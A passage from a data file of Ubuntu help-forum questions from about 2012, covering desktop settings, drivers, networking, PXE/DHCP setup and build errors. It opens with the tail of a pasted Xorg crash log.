0 ) : edid for output s-video [ 25.696 ] ( ii ) radeon ( 0 ) : edid for output dvi-0 [ 25.728 ] ( ii ) radeon ( 0 ) : edid for output dvi-1 [ 25.728 ] ( ii ) radeon ( 0 ) : output vga-0 connected [ 25.728 ] ( ii ) radeon ( 0 ) : output s-video disconnected [ 25.728 ] ( ii ) radeon ( 0 ) : output dvi-0 disconnected [ 25.728 ] ( ii ) radeon ( 0 ) : output dvi-1 disconnected [ 25.728 ] ( ii ) radeon ( 0 ) : using exact sizes for initial modes [ 25.729 ] ( ii ) radeon ( 0 ) : output vga-0 using initial mode 1920x1080 [ 25.729 ] ( ii ) radeon ( 0 ) : using default gamma of ( 1.0 , 1.0 , 1.0 ) unless otherwise stated . [ 25.729 ] ( ii ) radeon ( 0 ) : mem size init : gart size :1fdff000 vram size : s:10000000 visible : f7d7000 [ 25.729 ] ( ii ) radeon ( 0 ) : exa : driver will allow exa pixmaps in vram [ 25.729 ] ( ** ) radeon ( 0 ) : display dimensions : ( 480 , 270 ) mm [ 25.729 ] ( ** ) radeon ( 0 ) : dpi set to ( 101 , 101 ) [ 25.729 ] ( ii ) loading sub module `` fb '' [ 25.729 ] ( ii ) loadmodule : `` fb '' [ 25.729 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 25.729 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 25.729 ] compiled for 1.10.4 , module version = 1.0.0 [ 25.729 ] abi class : x.org ansi c emulation , version 0.4 [ 25.729 ] ( ii ) loading sub module `` ramdac '' [ 25.729 ] ( ii ) loadmodule : `` ramdac '' [ 25.729 ] ( ii ) module `` ramdac '' already built-in [ 25.729 ] ( ii ) unloadmodule : `` vesa '' [ 25.729 ] ( ii ) unloading vesa [ 25.729 ] ( ii ) unloadmodule : `` fbdev '' [ 25.729 ] ( ii ) unloading fbdev [ 25.729 ] ( ii ) unloadmodule : `` fbdevhw '' [ 25.729 ] ( ii ) unloading fbdevhw [ 25.729 ] ( -- ) depth 24 pixmap format is 32 bpp [ 25.729 ] ( ii ) radeon ( 0 ) : [ dri2 ] setup complete [ 25.729 ] ( ii ) radeon ( 0 ) : [ dri2 ] dri driver : r300 [ 25.729 ] ( ii ) radeon ( 0 ) : front buffer size : 8160k [ 25.729 ] ( ii ) radeon ( 0 ) : vram usage limit set to 221065k [ 25.729 ] ( == ) radeon ( 0 ) : backing store disabled [ 25.729 ] ( ii ) radeon ( 0 ) : direct rendering enabled [ 25.729 ] ( ii ) radeon ( 0 ) : render acceleration enabled for r300/r400/r500 type cards . [ 25.729 ] ( ii ) radeon ( 0 ) : setting exa maxpitchbytes [ 25.729 ] ( ii ) exa ( 0 ) : driver allocated offscreen pixmaps [ 25.729 ] ( ii ) exa ( 0 ) : driver registered support for the following operations : [ 25.729 ] ( ii ) solid [ 25.729 ] ( ii ) copy [ 25.729 ] ( ii ) composite ( render acceleration ) [ 25.729 ] ( ii ) uploadtoscreen [ 25.729 ] ( ii ) downloadfromscreen [ 25.729 ] ( ii ) radeon ( 0 ) : acceleration enabled [ 25.729 ] ( == ) radeon ( 0 ) : dpms enabled [ 25.729 ] ( == ) radeon ( 0 ) : silken mouse enabled [ 25.729 ] ( ii ) radeon ( 0 ) : set up textured video [ 25.729 ] ( ii ) radeon ( 0 ) : [ xvmc ] associated with radeon textured video . [ 25.729 ] ( ii ) radeon ( 0 ) : [ xvmc ] extension initialized . [ 25.729 ] ( ii ) radeon ( 0 ) : randr 1.2 enabled , ignore the following randr disabled message . [ 25.736 ] ( -- ) randr disabled [ 25.736 ] ( ii ) initializing built-in extension generic event extension [ 25.736 ] ( ii ) initializing built-in extension shape [ 25.736 ] ( ii ) initializing built-in extension mit-shm [ 25.736 ] ( ii ) initializing built-in extension xinputextension [ 25.736 ] ( ii ) initializing built-in extension xtest [ 25.736 ] ( ii ) initializing built-in extension big-requests [ 25.736 ] ( ii ) initializing built-in extension sync [ 25.736 ] ( ii ) initializing built-in extension xkeyboard [ 25.736 ] ( ii ) initializing built-in extension xc-misc [ 25.736 ] ( ii ) initializing built-in extension security [ 25.736 ] ( ii ) initializing built-in extension xinerama [ 25.736 ] ( ii ) initializing built-in extension xfixes [ 25.736 ] ( ii ) initializing built-in extension render [ 25.736 ] ( ii ) initializing built-in extension randr [ 25.736 ] ( ii ) initializing built-in extension composite [ 25.736 ] ( ii ) initializing built-in extension damage [ 25.736 ] ( ii ) initializing built-in extension gesture [ 25.741 ] ( ii ) aiglx : trying dri driver /usr/lib/x86_64-linux-gnu/dri/r300_dri.so [ 25.750 ] ( ii ) aiglx : enabled glx_mesa_copy_sub_buffer [ 25.750 ] ( ii ) aiglx : enabled glx_intel_swap_event [ 25.750 ] ( ii ) aiglx : enabled glx_sgi_swap_control and glx_mesa_swap_control [ 25.750 ] ( ii ) aiglx : enabled glx_sgi_make_current_read [ 25.750 ] ( ii ) aiglx : glx_ext_texture_from_pixmap backed by buffer objects [ 25.751 ] ( ii ) aiglx : loaded and initialized r300 [ 25.751 ] ( ii ) glx : initialized dri2 gl provider for screen 0 [ 25.751 ] ( ii ) radeon ( 0 ) : setting screen physical size to 508 x 285 [ 25.766 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 25.773 ] ( ii ) config/udev : adding input device power button ( /dev/input/event1 ) [ 25.773 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 25.773 ] ( ii ) loadmodule : `` evdev '' [ 25.773 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 25.773 ] ( ii ) module evdev : vendor= '' x.org foundation '' [ 25.773 ] compiled for 1.10.2 , module version = 2.6.0 [ 25.773 ] module class : x.org xinput driver [ 25.773 ] abi class : x.org xinput driver , version 12.3 [ 25.774 ] ( ii ) using input driver 'evdev ' for 'power button' [ 25.774 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 25.774 ] ( ** ) power button : always reports core events [ 25.774 ] ( ** ) power button : device : `` /dev/input/event1 '' [ 25.774 ] ( -- ) power button : found keys [ 25.774 ] ( ii ) power button : configuring as keyboard [ 25.774 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxpwrbn:00/input/input1/event1 '' [ 25.774 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard ) [ 25.774 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 25.774 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 25.774 ] ( ** ) option `` xkb_layout '' `` us , gr '' [ 25.774 ] ( ** ) option `` xkb_variant '' `` , '' [ 25.774 ] ( ** ) option `` xkb_options '' `` grp : alt_shift_toggle , grp_led : scroll '' [ 25.775 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-9078d1f245fade3cb4ad835262e1036c04792e56.xkm [ 25.777 ] ( ii ) config/udev : adding input device power button ( /dev/input/event0 ) [ 25.777 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 25.777 ] ( ii ) using input driver 'evdev ' for 'power button' [ 25.777 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 25.777 ] ( ** ) power button : always reports core events [ 25.777 ] ( ** ) power button : device : `` /dev/input/event0 '' [ 25.777 ] ( -- ) power button : found keys [ 25.777 ] ( ii ) power button : configuring as keyboard [ 25.777 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0c0c:00/input/input0/event0 '' [ 25.777 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard ) [ 25.777 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 25.777 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 25.777 ] ( ** ) option `` xkb_layout '' `` us , gr '' [ 25.777 ] ( ** ) option `` xkb_variant '' `` , '' [ 25.777 ] ( ** ) option `` xkb_options '' `` grp : alt_shift_toggle , grp_led : scroll '' [ 25.780 ] ( ii ) config/udev : adding input device microsoft microsoft wireless optical mouse® 1.00 ( /dev/input/event2 ) [ 25.780 ] ( ** ) microsoft microsoft wireless optical mouse® 1.00 : applying inputclass `` evdev pointer catchall '' [ 25.780 ] ( ii ) using input driver 'evdev ' for 'microsoft microsoft wireless optical mouse® 1.00' [ 25.780 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 25.780 ] ( ** ) microsoft microsoft wireless optical mouse® 1.00 : always reports core events [ 25.780 ] ( ** ) microsoft microsoft wireless optical mouse® 1.00 : device : `` /dev/input/event2 '' [ 25.780 ] ( -- ) microsoft microsoft wireless optical mouse® 1.00 : found 9 mouse buttons [ 25.780 ] ( -- ) microsoft microsoft wireless optical mouse® 1.00 : found scroll wheel ( s ) [ 25.780 ] ( -- ) microsoft microsoft wireless optical mouse® 1.00 : found relative axes [ 25.780 ] ( -- ) microsoft microsoft wireless optical mouse® 1.00 : found x and y relative axes [ 25.780 ] ( ii ) microsoft microsoft wireless optical mouse® 1.00 : configuring as mouse [ 25.780 ] ( ii ) microsoft microsoft wireless optical mouse® 1.00 : adding scrollwheel support [ 25.780 ] ( ** ) microsoft microsoft wireless optical mouse® 1.00 : yaxismapping : buttons 4 and 5 [ 25.780 ] ( ** ) microsoft microsoft wireless optical mouse® 1.00 : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 25.780 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:13.3/usb5/5-1/5-1:1.0/input/input2/event2 '' [ 25.780 ] ( ii ) xinput : adding extended input device `` microsoft microsoft wireless optical mouse® 1.00 '' ( type : mouse ) [ 25.780 ] ( ii ) microsoft microsoft wireless optical mouse® 1.00 : initialized for relative axes . [ 25.780 ] ( ** ) microsoft microsoft wireless optical mouse® 1.00 : ( accel ) keeping acceleration scheme 1 [ 25.780 ] ( ** ) microsoft microsoft wireless optical mouse® 1.00 : ( accel ) acceleration profile 0 [ 25.781 ] ( ** ) microsoft microsoft wireless optical mouse® 1.00 : ( accel ) acceleration factor : 2.000 [ 25.781 ] ( ** ) microsoft microsoft wireless optical mouse® 1.00 : ( accel ) acceleration threshold : 4 [ 25.781 ] ( ii ) config/udev : adding input device microsoft microsoft wireless optical mouse® 1.00 ( /dev/input/mouse0 ) [ 25.781 ] ( ii ) no input driver/identifier specified ( ignoring ) [ 25.782 ] ( ii ) config/udev : adding input device logitech logitech usb keyboard ( /dev/input/event3 ) [ 25.782 ] ( ** ) logitech logitech usb keyboard : applying inputclass `` evdev keyboard catchall '' [ 25.782 ] ( ii ) using input driver 'evdev ' for 'logitech logitech usb keyboard' [ 25.782 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 25.782 ] ( ** ) logitech logitech usb keyboard : always reports core events [ 25.782 ] ( ** ) logitech logitech usb keyboard : device : `` /dev/input/event3 '' [ 25.782 ] ( -- ) logitech logitech usb keyboard : found keys [ 25.782 ] ( ii ) logitech logitech usb keyboard : configuring as keyboard [ 25.782 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:13.5/usb1/1-8/1-8.1/1-8.1:1.0/input/input3/event3 '' [ 25.782 ] ( ii ) xinput : adding extended input device `` logitech logitech usb keyboard '' ( type : keyboard ) [ 25.782 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 25.782 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 25.782 ] ( ** ) option `` xkb_layout '' `` us , gr '' [ 25.782 ] ( ** ) option `` xkb_variant '' `` , '' [ 25.782 ] ( ** ) option `` xkb_options '' `` grp : alt_shift_toggle , grp_led : scroll '' [ 25.783 ] ( ii ) config/udev : adding input device logitech logitech usb keyboard ( /dev/input/event4 ) [ 25.783 ] ( ** ) logitech logitech usb keyboard : applying inputclass `` evdev keyboard catchall '' [ 25.783 ] ( ii ) using input driver 'evdev ' for 'logitech logitech usb keyboard' [ 25.783 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 25.783 ] ( ** ) logitech logitech usb keyboard : always reports core events [ 25.783 ] ( ** ) logitech logitech usb keyboard : device : `` /dev/input/event4 '' [ 25.783 ] ( -- ) logitech logitech usb keyboard : found 1 mouse buttons [ 25.783 ] ( -- ) logitech logitech usb keyboard : found keys [ 25.783 ] ( ii ) logitech logitech usb keyboard : configuring as mouse [ 25.783 ] ( ii ) logitech logitech usb keyboard : configuring as keyboard [ 25.783 ] ( ** ) logitech logitech usb keyboard : yaxismapping : buttons 4 and 5 [ 25.783 ] ( ** ) logitech logitech usb keyboard : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 25.783 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:13.5/usb1/1-8/1-8.1/1-8.1:1.1/input/input4/event4 '' [ 25.783 ] ( ii ) xinput : adding extended input device `` logitech logitech usb keyboard '' ( type : keyboard ) [ 25.783 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 25.783 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 25.783 ] ( ** ) option `` xkb_layout '' `` us , gr '' [ 25.783 ] ( ** ) option `` xkb_variant '' `` , '' [ 25.783 ] ( ** ) option `` xkb_options '' `` grp : alt_shift_toggle , grp_led : scroll '' [ 25.784 ] backtrace : [ 25.784 ] 0 : /usr/bin/x ( xorg_backtrace+0x26 ) [ 0x460566 ] [ 25.784 ] 1 : /usr/bin/x ( 0x400000+0x64b7a ) [ 0x464b7a ] [ 25.784 ] 2 : /lib/x86_64-linux-gnu/libpthread.so.0 ( 0x7f5cf5be3000+0x10060 ) [ 0x7f5cf5bf3060 ] [ 25.784 ] 3 : /usr/bin/x ( _mipointersetposition+0x121 ) [ 0x45d671 ] [ 25.784 ] 4 : /usr/bin/x ( getpointerevents+0x3ea ) [ 0x44488a ] [ 25.784 ] 5 : /usr/bin/x ( xf86postmotioneventm+0x73 ) [ 0x4805b3 ] [ 25.784 ] 6 : /usr/lib/xorg/modules/input/evdev_drv.so ( 0x7f5cef1a3000+0x5f23 ) [ 0x7f5cef1a8f23 ] [ 25.784 ] 7 : /usr/lib/xorg/modules/input/evdev_drv.so ( 0x7f5cef1a3000+0x65fb ) [ 0x7f5cef1a95fb ] [ 25.784 ] 8 : /usr/bin/x ( 0x400000+0x6da77 ) [ 0x46da77 ] [ 25.784 ] 9 : /usr/bin/x ( 0x400000+0x1229ee ) [ 0x5229ee ] [ 25.784 ] 10 : /lib/x86_64-linux-gnu/libpthread.so.0 ( 0x7f5cf5be3000+0x10060 ) [ 0x7f5cf5bf3060 ] [ 25.784 ] 11 : /lib/x86_64-linux-gnu/libc.so.6 ( __open64+0x10 ) [ 0x7f5cf4bd1840 ] [ 25.784 ] 12 : /lib/x86_64-linux-gnu/libc.so.6 ( _io_file_fopen+0xd9 ) [ 0x7f5cf4b72389 ] [ 25.784 ] 13 : /lib/x86_64-linux-gnu/libc.so.6 ( 0x7f5cf4afe000+0x69166 ) [ 0x7f5cf4b67166 ] [ 25.784 ] 14 : /lib/x86_64-linux-gnu/libudev.so.0 ( 0x7f5cf648b000+0x5c0b ) [ 0x7f5cf6490c0b ] [ 25.784 ] 15 : /lib/x86_64-linux-gnu/libudev.so.0 ( udev_device_get_devnode+0x31 ) [ 0x7f5cf649171c ] [ 25.784 ] 16 : /usr/bin/x ( 0x400000+0x1238e9 ) [ 0x5238e9 ] [ 25.784 ] 17 : /usr/bin/x ( 0x400000+0x12432e ) [ 0x52432e ] [ 25.784 ] 18 : /usr/bin/x ( config_init+0x9 ) [ 0x5235d9 ] [ 25.784 ] 19 : /usr/bin/x ( initinput+0xf5 ) [ 0x472655 ] [ 25.784 ] 20 : /usr/bin/x ( 0x400000+0x232c6 ) [ 0x4232c6 ] [ 25.784 ] 21 : /lib/x86_64-linux-gnu/libc.so.6 ( __libc_start_main+0xed ) [ 0x7f5cf4b1f30d ] [ 25.784 ] 22 : /usr/bin/x ( 0x400000+0x235ed ) [ 0x4235ed ] [ 25.784 ] segmentation fault at address 0x7fff00000780 [ 25.784 ] caught signal 11 ( segmentation fault ) . server aborting [ 25.784 ] please consult the the x.org foundation support at http : //wiki.x.org for help . [ 25.784 ] please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 25.784 ] [ 25.784 ] ( ii ) power button : close [ 25.784 ] ( ii ) unloadmodule : `` evdev '' [ 25.784 ] ( ii ) unloading evdev [ 25.784 ] ( ii ) power button : close [ 25.784 ] ( ii ) unloadmodule : `` evdev '' [ 25.784 ] ( ii ) unloading evdev [ 25.785 ] ( ii ) microsoft microsoft wireless optical mouse® 1.00 : close [ 25.785 ] ( ii ) unloadmodule : `` evdev '' [ 25.785 ] ( ii ) unloading evdev [ 25.785 ] ( ii ) logitech logitech usb keyboard : close [ 25.785 ] ( ii ) unloadmodule : `` evdev '' [ 25.785 ] ( ii ) unloading evdev [ 25.785 ] ( ii ) logitech logitech usb keyboard : close [ 25.785 ] ( ii ) unloadmodule : `` evdev '' [ 25.785 ] ( ii ) unloading evdev [ 25.785 ] ( ii ) aiglx : suspending aiglx clients for vt switch [ 25.802 ] ddxsiggiveup : closing log
101310	show all running windows when moving mouse pointer to top-left corner hotspot ?	currently in 11.10 ( and also 12.04 ) , slamming your mouse pointer in the top left corner of the screen does nothing . worse , even clicking there is a dead zone ; i would expect to have at least the dash open when clicking there . not sure if this is a bug or not . ideally i would like to have the gnome 3 behavior , which shows all open applications when you move the mouse pointer to the top-left corner . i know i can do something with compiz settings ; i can configure a script to run , however i do n't know how i can make a script go ' super + w ' ? is that possible ? i hope there will be a full and unified settings panel again when 12.04 goes live ; it 's a bit strange to not only use a whole separate settings panel for some things , but even one that 's not installed by default ! and 'corner hot spots ' should definitely be a function in there , to assign common actions and keystrokes to that .
101315	how can i enable wifi on my ubuntu 11.10 xps l702x ?	network configuration : 'wireless is disabled by hardware switch' 'enable wireless ' is disabled and i can not enable it when i press super+f2 - no results . wifi is not fires on a pad .
101317	custom ubuntu launcher does n't launch	i use ubuntu 11.04 and gnome 2.32.1 . i want to create a new launcher for sql developer on the desktop with the following value : name : sqldeveloper command : /bin/sh /opt/sqldeveloper/sqldeveloper.sh icon : a icon in the directory of sql developer when i click or double-click on the launcher nothing happen . $ ls -l /opt/sqldeveloper/sqldeveloper.sh -rwxr-xr-x /opt/sqldeveloper/sqldeveloper.sh what should i do ?
101320	how do i open new windows of a running app on another workspace under unity ?	since ubuntu 11.10 , it is really difficult to get multiple workspaces like ubuntu 10.04 . for example : when i wanted to open a new firefox window , i just had to go to the next workspace and hit the firefox icon . with unity , this is n't possible anymore . when i hit the icon , it goes back to the original firefox window . i know it is possible to use gnome classic , but this does n't work very well and is not stable . how can i achieve this ?
101326	how can i run different xfce sessions for the same user ?	i like to have two ( or more ) different xfce sessions for one user which have differences in autostart programs , panel design and others . is it possible to make that , are there profiles for xfce ? ( for lxde , there are ) how can i set / switch between different profiles ?
101330	change curser location to bring up unity launcher	i want the launcher to show when i move the cursor to the top-left corner instead of the left edge because the way it is it tends to show when i do n't want it to . how can i do that_
101333	is it possible to completely and safely remove ubuntu 11.10	i have got windows xp and by dual-boot method installed ubuntu 11.10 . i do not want , to un install ubuntu , but i 'm interested . is it possible to completely and safely un-install ubuntu from dual-boot , and recover all the hard disk space , that ubuntu has stolen from windows ? and may i , when i 'll want it , reinstall it again ?
101335	how to enable dhcp server to all subnets for pxe server ?	i have setup-ed a pxe boot server for installing ubuntu via network . currently i am using hosts mac address to install the ubuntu operating system . i would like to enable the dhcp server in all the subnets for example 172.29.34.0/24 172.29.36.0/24 etc.. instead of using its mac address . please find my current configuration below , dhcp server configuration : allow booting ; allow bootp ; subnet 172.29.32.0 netmask 255.255.255.0 { range 172.29.32.20 172.29.32.200 ; option broadcast-address 172.29.1.255 ; option routers 172.29.32.1 ; } group { next-server 172.29.32.9 ; filename `` /pxelinux.0 '' ; host webppc { hardware ethernet bc:30:5b : c3:23:69 ; option host-name `` webppc '' ; } }
101337	ca n't download anything when installing ubuntu with minimal ?	i 'm having this little problem when trying to do an install from the minimal cd , no matter which mirror i pick , nothing downloads . what 's worse is that i tried to install the minimal cd in a vm and everything downloaded accordingly but the vm would n't boot but that 's another problem , now that i 'm using it in a real system nothing downloads , what could be the problem ? .
101338	gtk vertical spacing too condensed	i installed gnome-shell - for who knows what reason - on natty , from gnome3 launchpad ppa : sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get update sudo apt-get upgrade sudo apt-get install gnome-shell sudo apt-get install gnome-session after i realized i made mistake : ppa-purge ppa : gnome3-team/gnome3 sudo apt-get update and reverted system to previous state . everything seems fine except one problem - vertical spacing on some gtk elements . i had screenshot taken week ago and made new one for comparison ( left window is good and right is bad ) : http : //i.stack.imgur.com/hdvlh.png screenshot is from scite editor , but it 's same in other editors , in eclipse , in nautilus side pane ... everything is condensed and in some cases ( firefox 10 dropdown addressbar history ) bottom part of font is missing because of this issue . changing theme does n't help , so it 's not some gtkrc issue . if i use spartan non gtk+ theme there is not issue , in case it matters can i do something to solve this issue ? update 1 : i launched guest session , and there were no issues , so problem is in my own profile . i deleted ~/.compiz folder , but nothing changed after relogin following the link provided by amith , i did : gconftool -- shutdown killall -r -i -9 dconf killall -r -i -9 gconf mv gconf-backup .gconf mv config-dconf .config/dconf sudo reboot still nothing : ( what else could it be ? update 2 : i managed to make nautilus side pane as before , by hand crafting current theme 's gtkrc file : gtktreeview : :vertical_separator = 2 now if someone could only provide tip how to set vertical separator for editors gtk widgets ( whatever they are called ) . i could not find any reference also i found out that root user does n't have this problem , as can be seen from this screen-shot : http : //i.stack.imgur.com/qcaob.png in case someone gets other idea ; )
101345	how to remove the panel at the right side of the ubuntu screen ?	when on the system , this gray bar takes up part of the right side and does not go away , despite changing backgrounds and appearance of menus . if the user is switched , the gray bar does not appear on the other user 's account . is there a way that i can remove this bar ?
101348	how to check file system at every restart ?	my pc restart about 6 to 7 times a days because of electricity fluctuate . so i want to ask : do i have to run fsck/tune2fs tools to check my file system at every restart or do you recommend something else ?
101350	software similar to nautilus-share in thunar ?	i 'm looking for something like nautilus-share for thunar , does it exist ? if not please tell me how do i share a folder in xubuntu ?
101351	forcing an application to use gtk 3 instead of gtk 2	is there anyway to force an application to use gtk3+ instead of gtk2+ ?
101352	why i 'm not asked to set a password for root when installing ubuntu ?	when i install ubuntu , it never shows an option to set a password , yet there is a password when trying to log in to the admin account and when i try to install packages . i ca n't change the password in root because when i try to it says `` authentication manipulation token error '' . when i try to fix the shadow password thing in root it says access denied .
101353	batch convert ai files to pdf / png etc	does anybody know of software that can batch convert .ai into another format ? preferably png or pdf ?
101356	help with persistence	every time i get to a certain stage of installing either the wireless drivers , or fbreader , or vlc when my system hangs or crashes . ? then on reboot , i am asked for a password by ubuntu , which i do n't have ... after which i need to restart with a new install using unebootin ... please can someone help me do the following with no errors : 1 ) get all updates and upgrades with no 'package opertation failed ' errors 2 ) get wireless drivers installed and working 3 ) get fbreader and vlc installed and working . btw , i am still a beginner just getting the hang of the terminal i replaced my 2 year old kingston data traveller usb stick yesterday with a new sandisk cruze blade in case that was the issue thaks philip
101357	why is firefox not rendering `` long '' images correctly ?	when i visit webpages that have long images firefox is not rendering them correctly . it seems to be the very long pictures the cause this problem . i do n't know where the breaking point is for this . you can look at the picture here the picture is on 9gag.com and they sometimes remove pictures so i 've uploaded a screenshot to photobucket also . as you can see in the picture chromium is rendering the picture correctly but not firefox . i 've tried deactivating all my addons without any change to the rendering . i 'm using a 100/100mbit connection via a 1gbit router and the connection is my own . is there a solution to this other then using chromium ? because i rather use firefox . i have tried google but not found any answers regarding this problem . i do n't have an other computer to try on . thankful for any help .
101359	how to retain the wireless settings using ndiswrapper	i have an older laptop and ubuntu does not have drivers for my wireless pcmcia card . so i found the windows drivers and loaded them with ndiswrapper via the windows wireless drivers utility app . i can load the drivers and the card then works fine ... no problems at all . the problem is to keep these settings once the machine is shut down or rebooted . at present , the settings are lost if this is done and i have to reinstall the wireless driver every time . i have tried various suggestions on how to keep the settings but so far none of them have worked . there has to be a configuration file somewhere that contains the wireless setup info but i do not know what or where it is .
101371	hp deskjet f2400 no longer shows up in cups web interface	after updating to oneiric , my printer ( hp deskjet f2400 , shared ) no longer appears on the cups web interface of my other machines and is not listed in apps on them ( 2 , running slackware 13.37 ) , though i can print using lp -h .
101374	can i leave something like a mark or bookmark in banshee on an audio book for example ?	i 'm listening to an 11 hour audio book , it 's a real pain having to find the exact spot i was last . is there a way to mark or place a sort of bookmark to the audio track ?
101378	i can not find anything in libreoffice help	i have packages libreoffice-help-en-gb and libreoffice-help-en-us installed . libreoffice 3.4.4 ooo340m1 ( build:402 ) pre-installed on ubuntu oneiric here is the screen shot . error message : no topics found i think it related to jre because i run a live cd ubuntu and found that it showed a message saying that `` this feature requires java runtime environment '' , but i have jre 6 installed on my current distribution ( not the live cd version ) , or maybe it needs jre 7 ?
101380	ubuntu one client for meego	i am using ubuntu one clients on different platforms and it 's all working very well , as there are win 7 pcs and ubuntu 11.10 , where it is integated already . now i 'm trying to add my mobile , which i thought would not be a problem , as my mobile , a nokia n9 , runs on meego , linux in fact . could there be a chance to get a client for meego ? android and ios are existing , so could it be a hard challenge ? i also thougt about switching to dropbox , because clients for windows , ubuntu and meego are available at dropbox , but as a linux-fan i would of course wait for a ubuntu one-solution . all i could find was a project at google , you can find here : http : //code.google.com/p/meego-u1/ unfortunately i am ony a user not a developer . greetins
101382	best half mini pci-e ( laptop ) wireless card	i 'm thinking about replacing the wireless card on my laptop ( an atheros ar9285 ) because it is slow . what are the best half mini pci-e 802.11n cards with 300 mbps max speed and two antennas ? i wa n't one that works well with ubuntu .
101392	can i boot from a sd card on a dell mini 9 ?	i have installed from the live usb ( with persistance ) onto an sd card . but when i reboot , even though i have selected usb devices in the boot selection menu i get an os not found error ... has anyone suceeded in doing this ?
101398	error message on ubuntu one page	i get the following message when ubuntu one loads and can not sync contacts . value could not be retrieved . value could not be retrieved . ( dbusexception : org.freedesktop.dbus.error.spawn.childexited : process /usr/lib/deskt
101399	ubuntu logs off on shutdown , proper shutdown/restart too doesnt work	i do n't know what i did or what happened ? but my ubuntu logs off on clicking shutdown ... running the shutdown or reboot command too does n't shutdown ... . how can i find the log ? all i know is there is a message saying ... . power_table_cmd wait for 500 sec and something similar it gets stuck on ubuntu plymouth ... i have to long press the power button on my laptop to shut it off here is what i get when i try to shutdown ...
101406	apache remembers .htaccess induced redirect command	i wanted to redirect localhost/~mu/ to localhost/~mu/branches_index/ and created a .htaccess file with a redirect /~mu/ /~mu/branches_index/ . that did not work out as expected since it changed every single files , even in other folders . then i created an index.php with the simple content of : < ? php header ( 'location : branches_index/ ' ) ; ? > the .htaccess file is deleted . if i now open localhost/~mu/ , i end up at : http : //localhost/~mu/branches_index/index.phpbranches_index/index.phpbranches_index/index.phpbranches_index/index.phpbranches_index/index.phpbranches_index/index.phpbranches_index/index.phpbranches_index/index.phpbranches_index/index.phpbranches_index/index.phpbranches_index/index.phpbranches_index/index.phpbranches_index/index.phpbranches_index/index.phpbranches_index/index.phpbranches_index/index.phpbranches_index/index.phpbranches_index/index.phpbranches_index/index.php if i open localhost/~mu/index.php , i end up at localhost/~mu/branches_index/ . rebooting did not help and i am pretty sure the .htaccess there is gone . how can i fix this ?
101410	sound coming out from speaker and headphone on an acer aspire one model 722	i am running ubuntu 11.04 on acer aspire one model 722 . the problem is that sound keep coming out from the internal speaker even after plugging the headphone in . now , i am a beginner in the ubuntu and linux world . i would appreciate every detailed help . running alsamixer i noticed that the headphone jack sense does n't exist at all . i 'm wondering if there are interim steps that need to be taken . thank you !
101411	how can i compile the opencl module for pyrit ?	i want to use my gpu with pyrit . i use ubuntu 11.10 , ati radeon hd 68xx and i7 2600k . step done : install latest ati driver from manufacturer website install amd app sdk when i run benchmark i get : ~ $ pyrit benchmark pyrit 0.4.0 ( c ) 2008-2011 lukas lueg http : //pyrit.googlecode.com this code is distributed under the gnu general public license v3+ running benchmark ( 5037.4 pmks/s ) ... - computed 5037.45 pmks/s total . # 1 : 'cpu-core ( sse2 ) ' : 667.8 pmks/s ( rtt 3.2 ) # 2 : 'cpu-core ( sse2 ) ' : 661.6 pmks/s ( rtt 3.2 ) # 3 : 'cpu-core ( sse2 ) ' : 664.0 pmks/s ( rtt 3.2 ) # 4 : 'cpu-core ( sse2 ) ' : 660.5 pmks/s ( rtt 3.2 ) # 5 : 'cpu-core ( sse2 ) ' : 669.7 pmks/s ( rtt 3.2 ) # 6 : 'cpu-core ( sse2 ) ' : 656.3 pmks/s ( rtt 3.2 ) # 7 : 'cpu-core ( sse2 ) ' : 667.4 pmks/s ( rtt 3.2 ) # 8 : 'cpu-core ( sse2 ) ' : 662.6 pmks/s ( rtt 3.1 ) how to make sure that amd app sdk is correctly installed ? how to configure pyrit to use opencl and my gpu ? edit : uninstalled pyrit and re-installed amd app sdk . when trying to compile opencl support module for pyrit i get this error : $ sudo python setup.py build the headers required to build the opencl-kernel were not found . trying to continue anyway ... svn : ' . ' is not a working copy running build running build_ext building modules ... building 'cpyrit._cpyrit_opencl ' extension gcc -pthread -fno-strict-aliasing -dndebug -g -fwrapv -o2 -wall -wstrict-prototypes -fpic -i/usr/include/python2.7 -c _cpyrit_opencl.c -o build/temp.linux-x86_64-2.7/_cpyrit_opencl.o -dversion= '' 0.3.0 '' _cpyrit_opencl.c:23:19 : fatal error : cl/cl.h : no such file or directory compilation terminated . error : command 'gcc ' failed with exit status 1
101417	share folders on dual-boot wubi and windows	i have a wubi install that was originally ubuntu 11.10 , but i upgraded manually to 12.04 . my question is how to access files on both os 's from either one . when i am in windows , i can locate the wubi `` hard drive '' file , but can not find anything when in ubuntu . for windows , i have win7 installed .
